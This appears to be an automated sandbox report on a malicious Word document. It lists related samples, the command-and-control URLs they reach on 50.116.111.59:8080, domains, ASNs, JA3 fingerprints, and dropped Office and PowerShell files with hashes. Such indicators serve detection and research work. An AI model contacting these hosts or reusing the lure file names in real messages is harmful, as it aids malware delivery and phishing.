                                                                                                                              • 50.116.111.59:8080/rd6gz9k388ltevf/r77na/ajzbauvcf2/x5jv1yqwmaas34s/
                                                                                                                              https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/unlfwwzvo3nu/
                                                                                                                              adjunto 86028707-97299.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/gtnp7ctfs63434f509u/vi5pbfhvcpzd6po6u/
                                                                                                                              DOCUMENTO_MEDICO 047.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/fxj03p8nb/8bxykfnpf63q35rwg/9i1xa3srvbcrspryp/3w4lfheoymirfym/bvyc6d78gbr8o/kb3s02ub1n7cf9/
                                                                                                                              December Invoice.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/n3wh7cs8bxi/ytxv0cfwhgz/jjzbhmo3jqx9/6wp9z8y66m/g2irzjj1b45ynawfgh/30hz8zv/
                                                                                                                              MH1809380042BB.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/1lgocese97nii3al1/vw784nlo3edogtw0m/vsmt1rb3x8n1evlo5/my0x/rds7y7hqjo/1n6ca1ys3f/
                                                                                                                              http://avanttipisos.com.br/catalogo-virtual/i1XnbBRzXXXrqGLfBZ3UNn6Yjh1mubdZKDm48wvQD3thzthxMysXGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/kno2cm5jwc6m/tgmjzmpq/4jdm7z5y9l1javlg/da51anu0oz08tnv458/nzrpbfoaduoh4bi/
                                                                                                                              Nf3m8s.dllGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/20c0m7wf00/
                                                                                                                              https://upinsmokebatonrouge.com/var/kZKk4S0XnGUwc0OKsia1/Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/q3ikxf8rlo0rwmkk/
                                                                                                                              GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/
                                                                                                                              2G18HC8998F36.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/f0ttde5p/6pa3fz7e/35ronnbuwllcs3rpomc/

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              physio-svdh.chv22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106

                                                                                                                              ASN

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              SWISSCOMSwisscomSwitzerlandLtdCHv22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                                                              • 46.14.214.245
                                                                                                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                                                              • 46.14.214.245
                                                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                                              • 178.194.165.28
                                                                                                                              NormhjTcQb.exeGet hashmaliciousBrowse
                                                                                                                              • 212.243.31.234
                                                                                                                              pty10Get hashmaliciousBrowse
                                                                                                                              • 217.193.254.91
                                                                                                                              Astra.x86Get hashmaliciousBrowse
                                                                                                                              • 85.0.156.99
                                                                                                                              https://aplusserve.com/wp-content/plugins/antara/failed/encr-p-t-e-d/?email=maggiemk.wong@juliusbaer.comGet hashmaliciousBrowse
                                                                                                                              • 193.223.56.121
                                                                                                                              AWD1-2001028L PI.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.228.166
                                                                                                                              SWIFT COPY (2).exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.228.166
                                                                                                                              ipz.exeGet hashmaliciousBrowse
                                                                                                                              • 188.61.89.227
                                                                                                                              newageGet hashmaliciousBrowse
                                                                                                                              • 195.144.41.204
                                                                                                                              7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                                              • 164.206.111.135
                                                                                                                              miori.x86Get hashmaliciousBrowse
                                                                                                                              • 178.196.83.123
                                                                                                                              UnHAnaAW.x86Get hashmaliciousBrowse
                                                                                                                              • 178.192.36.116
                                                                                                                              Mozi.aGet hashmaliciousBrowse
                                                                                                                              • 213.3.4.52
                                                                                                                              WE3A0yB3klGet hashmaliciousBrowse
                                                                                                                              • 85.1.224.116
                                                                                                                              IpvLye.arm7Get hashmaliciousBrowse
                                                                                                                              • 178.195.108.154
                                                                                                                              whoareyou.mipsGet hashmaliciousBrowse
                                                                                                                              • 178.198.75.41
                                                                                                                              GOOGLE-2USv22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.153.170
                                                                                                                              2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.153.170
                                                                                                                              INFO_2020.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.69.64
                                                                                                                              REMITTANCE ADVICE REF0000360261_PDF.xlsxGet hashmaliciousBrowse
                                                                                                                              • 35.214.170.96
                                                                                                                              gDvIZEJQF2.xlsGet hashmaliciousBrowse
                                                                                                                              • 35.214.243.127
                                                                                                                              68254_2001.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.96.32
                                                                                                                              IMG-11862.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.61.46
                                                                                                                              ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.96.32
                                                                                                                              Calculation-380472272-01262021.xlsmGet hashmaliciousBrowse
                                                                                                                              • 35.208.103.169
                                                                                                                              453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.159.46
                                                                                                                              MPbBCArHPF.exeGet hashmaliciousBrowse
                                                                                                                              • 35.208.174.213
                                                                                                                              TBKK E12101010.xlsxGet hashmaliciousBrowse
                                                                                                                              • 35.208.174.213
                                                                                                                              ARCH-SO-930373.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.96.32
                                                                                                                              Info_C_780929.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.159.46
                                                                                                                              Factura.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.114.34
                                                                                                                              DAT 30 122020 664_16167.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.159.46
                                                                                                                              Beauftragung.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.114.34
                                                                                                                              sample2.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.199.246
                                                                                                                              55-2912.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.78.196
                                                                                                                              DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.169.246
                                                                                                                              CENTURYLINK-US-LEGACY-QWESTUSdavay.exeGet hashmaliciousBrowse
                                                                                                                              • 174.18.23.49
                                                                                                                              oHqMFmPndx.exeGet hashmaliciousBrowse
                                                                                                                              • 67.232.238.125
                                                                                                                              mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                              • 162.19.200.18
                                                                                                                              fil1Get hashmaliciousBrowse
                                                                                                                              • 184.6.30.51
                                                                                                                              8wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              iGet hashmaliciousBrowse
                                                                                                                              • 63.224.11.107
                                                                                                                              svchost.exeGet hashmaliciousBrowse
                                                                                                                              • 69.68.63.158
                                                                                                                              http://167.248.133.20Get hashmaliciousBrowse
                                                                                                                              • 167.248.133.20
                                                                                                                              EIS-120120 QZC-122220.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              Copy invoice #422380.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              9486874.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              Electronic form.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              TZ8322852306TL.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              http://gluonpharma.com/fonts/W/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                                                                                              • 75.162.127.230
                                                                                                                              bdOPjE89ck.dllGet hashmaliciousBrowse
                                                                                                                              • 72.165.68.237
                                                                                                                              http://167.248.133.24Get hashmaliciousBrowse
                                                                                                                              • 167.248.133.24

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eOOLU2115327710.xls.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              ITM inspection time change.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              shipping document.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              forderung.pdf.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              ROM_Files_939964.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              bLupWqls5l.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              Payment Receipt.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              UQtGj1Yzlf.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              INV-FACTUUR00921.xlsxGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              6729001591617.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              tQdHht8Bwc.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.471.11170.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              ttrpym.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              roboforex4multisetup.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              MV TAN BINH 135.pdf.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              SecuriteInfo.com.Variant.Zusy.363976.7571.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.519.21836.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              RFQ RPM202011-776JD.jpg.lnkGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              RFQ-Strip Casting Line.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DC97C0E2-E492-4CE8-9253-DB063F2B7EA0
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):132920
                                                                                                                              Entropy (8bit):5.373078821495444
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:CcQceNqaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:irQ9DQW+zBX8P
                                                                                                                              MD5:389C1461181EDC4905029C5E88D35AA2
                                                                                                                              SHA1:3E61E8C9A9739C2D53D7610C129047C5B332BBCC
                                                                                                                              SHA-256:C967124C561BD6E97DE925820D6CE8B20C64B913D1E343AEFB80FCD9EF96075A
                                                                                                                              SHA-512:74903A87EF4AB07D39F4E4DBCA642CEC14DDC9CA199A8559B710A55B10D0A92F6775202CF46E419213FE3B690CF660A5ADE38A5C1550410A5695112633E6D551
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-01T22:25:05">.. Build: 16.0.13731.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{179EC3B7-37E0-4560-80F5-16F3BFE059F5}.tmp
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1024
                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{87200191-4D4F-4DCD-B181-904D5E386871}.tmp
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1536
                                                                                                                              Entropy (8bit):1.3643824618899223
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Iiiiiiiiii8l+4V/Nc8++ldL61DX6tD6pV2E6qn:23dNG+PmBqZ6pV2pq
                                                                                                                              MD5:9731171E08A44D90DD005A586825086B
                                                                                                                              SHA1:FB904928494B5B3FEA79A40B4A6CA2F819790C25
                                                                                                                              SHA-256:7C33C462A36BAAB96EB896B42428B656C709D767B9C870ED47A2191B2A4B663C
                                                                                                                              SHA-512:4E689228FB0305952F5B8C4835B6F8D00F831B192AED6FD2F8EA0A7C3AD569A98428C2D74B3A7CD02A3B5F468FA0DF1B8DECA4F1F36BB6D8C44590CF4C5C74D5
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...p.r.a.t.e.s.h...p....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......>...B...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1196
                                                                                                                              Entropy (8bit):5.33361024576829
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HrCvKLoFe9tCKnKJF9iq:qZPerB4nqRL/HrCvjFe9tC4anv
                                                                                                                              MD5:3C95F06BAE25D8883754A9886A484998
                                                                                                                              SHA1:74684406A7FE82F6476D5D9C9AA63E075871A80E
                                                                                                                              SHA-256:9434B071A928518B9A14B79C07F4AD49F00E0E921C4FD868A4D8168E7ABFF938
                                                                                                                              SHA-512:32B51A03132B3CD0566A0B15A792C5E94729EB272238803B9E01A79487794FCB8B8EEE9F3284EDDE7AA4DE28F782DE6C5016E228DAD284E7F91F7D05AF6108DE
                                                                                                                              Malicious:false
                                                                                                                              Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..<................):gK..G...$.1.q........System.Configuration4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                              C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):170164
                                                                                                                              Entropy (8bit):4.358394535375791
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:fr9jQo7LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fr5g8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                              MD5:0CC8870D67DEEB05578F8107F79C3BC3
                                                                                                                              SHA1:90F1F216A983DA75584021C20243330727655EC6
                                                                                                                              SHA-256:997EDB52D239ECE12D62E6D41DD120AA74B013E8624498E352DC71F1B66E73B6
                                                                                                                              SHA-512:A8EEB1CA5B68D2A634726238AFFE761BF9C072629B3317E45B0CDA6D022E3B85F8157A4414F5857AE02585D4D6AB8953068E7F182B20D44FCDA14D03CF608A0A
                                                                                                                              Malicious:false
                                                                                                                              Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbmhr0zq.ixu.psm1
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview: 1
                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyrecgys.4kk.ps1
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview: 1
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):74
                                                                                                                              Entropy (8bit):4.060710299033871
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:M1blG+kLtCLs+kLtCmX1blG+kLtCv:MrG+kLtys+kLtzG+kLts
                                                                                                                              MD5:D9D81D211C7D3FE392C07C615275BBC8
                                                                                                                              SHA1:D0AFA7424E42C91595D6AF3178CEB8118A742FC4
                                                                                                                              SHA-256:8CA00953A5C409D8B6B2344A7DCD452A1A25A1F94E1034B2504919FFD123A8EB
                                                                                                                              SHA-512:FC4541A6A37F0D5AB6861417F2B68131D9C0C9708F3D413353EF11E71A721AE00E1F78BB0C78CAE1FB16DDCE2F39F86C75D780A9FDA863AF28301064F9B1A65C
                                                                                                                              Malicious:false
                                                                                                                              Preview: [doc]..v22Pc0qA.doc.LNK=0..v22Pc0qA.doc.LNK=0..[doc]..v22Pc0qA.doc.LNK=0..
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v22Pc0qA.doc.LNK
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Mon Feb 1 21:25:06 2021, atime=Mon Feb 1 21:25:03 2021, length=207253, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2130
                                                                                                                              Entropy (8bit):4.7012569507367346
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:8eEzitpCAKQWAkbbDG7aB6myeEzitpCAKQWAkbbDG7aB6m:8TzitpD9krB6pTzitpD9krB6
                                                                                                                              MD5:749427E569113450C7BA74A05F76CF1C
                                                                                                                              SHA1:1BB4517F99A24C9540CBEE35AB75E8AC818DE60C
                                                                                                                              SHA-256:17706A757CF169FFFAADE647211ADD561581721F26DFE0D62E427A82D6AEA4A6
                                                                                                                              SHA-512:944A79BE7B7306A7166F1626562528A43168C3CE9A649C61923ED0D9AC0C09B7952FFFEBA5F2C5F24740AF7A086BF0B65103C12AE635C72D514216662F537ED3
                                                                                                                              Malicious:false
                                                                                                                              Preview: L..................F.... ....B.S....?5...............)...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..AR......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..AR......#J....................I0H.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..AR.......Y..............>.......X.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2..)..AR". .V22PC0~1.DOC..R......>Q{<AR"......V......................U.v.2.2.P.c.0.q.A...d.o.c...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\v22Pc0qA.doc.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.v.2.2.P.c.0.q.A...d.o.c...d.o.c.........:..,.LB.)...As...`.......X.......724536...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):2.537027933460949
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
                                                                                                                              MD5:62D2E9D0E5A00A4933B40C773F2A3521
                                                                                                                              SHA1:D129090958A7122B098FD1CDE5A80D5FF74E9CF5
                                                                                                                              SHA-256:61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
                                                                                                                              SHA-512:563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
                                                                                                                              Malicious:false
                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22
                                                                                                                              Entropy (8bit):2.9808259362290785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:QAlX0Gn:QKn
                                                                                                                              MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                              SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                              SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                              SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                              Malicious:false
                                                                                                                              Preview: ....p.r.a.t.e.s.h.....
                                                                                                                              C:\Users\user\Desktop\~$2Pc0qA.doc.doc
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):2.537027933460949
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
                                                                                                                              MD5:62D2E9D0E5A00A4933B40C773F2A3521
                                                                                                                              SHA1:D129090958A7122B098FD1CDE5A80D5FF74E9CF5
                                                                                                                              SHA-256:61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
                                                                                                                              SHA-512:563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
                                                                                                                              Malicious:false
                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\Documents\20210201\PowerShell_transcript.724536.D_cV0UCD.20210201232511.txt
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11663
